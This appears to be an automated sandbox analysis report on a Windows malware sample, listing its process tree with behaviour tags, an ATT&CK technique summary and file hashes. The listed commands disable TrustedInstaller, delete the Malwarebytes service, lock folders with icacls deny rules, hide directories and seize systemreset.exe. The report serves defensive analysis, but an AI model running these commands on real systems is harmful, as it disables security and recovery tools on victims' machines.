C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\Windows\WindowsDefender"4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WindowsDefender" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM bvhost.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\bvhost"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\bvhost" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nssm.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM infodown.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM infoweb.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windowsdeffenders.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\syswow64\hhsm" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windir.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windir.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM lum.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM syslog.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Local\syslog"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wutphost.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Local\wutphost"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wutphost /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "Audio Emulation System.exe" /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM winlg.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\GoogleSoftware /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pythonw.exe /T /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UsersControl.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM WindowHelperStorageHostSystemThread118466.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM WindowHelperStorageHostSystemThread100040.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM WindowHelperStorageHostSystemThread106333.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wup.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\local\temp\wup"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\temp\wup /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\temp\wup /deny system:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM minergate-cli.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM msvc.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\Svcms"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\Svcms /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\Svcms /deny system:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM FileSystemDriver.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Local\FileSystemDriver"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\FileSystemDriver /deny system:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM geckof.exe /T /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Local\geckof"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\geckof /deny system:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM initwin.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\initwin /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM packagest.exe /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\packagest /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM ursb.exe /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hssvc.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xmrig.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM pythonw.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\gpupdate.exegpupdate /force4⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CPU.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\sc.exesc config trustedinstaller start= Disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f c:\windows\system32\systemreset.exe4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\System32\systemreset.exe /setowner Admin4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\windows\System32\systemreset.exe" /grant:r Admin:F4⤵
- Modifies file permissions
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
1Hidden Users
1Impair Defenses
5Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
35KB
MD5dad58eed25efd2b546df6c00a3a8f2de
SHA1ebfadd893b3c180d9bae609426b54e2b9e1031bc
SHA256833584a88f27a0032168635ada5328c37645d103d8839a49e2e69765b9709747
SHA512ae72c0d3752fed32b63cb5fed9f47a5b9d08ecef50fa4c5219e11fce2e7c7e4f8a1def20cb9335e9cb27635591dfe034334c6a37fccc39ba68b7551ed224ad38
-
Filesize
149B
MD553c898c41adece457d5f852819fe312c
SHA1a903277870d632c2c07af2ad1250509cac412f5c
SHA2564d0bc7e392bbacc9a61ba323eea9f492b568416d39c9ad29f1fd77f2b422f556
SHA51243e6b2105b5a1ca796df069320cf3b137d0f4ff16ebbf262eb37e6935519a7da26f21a5e95edf247d47896609f25e624b2bd96db6d73e397c161ddff2bf9e074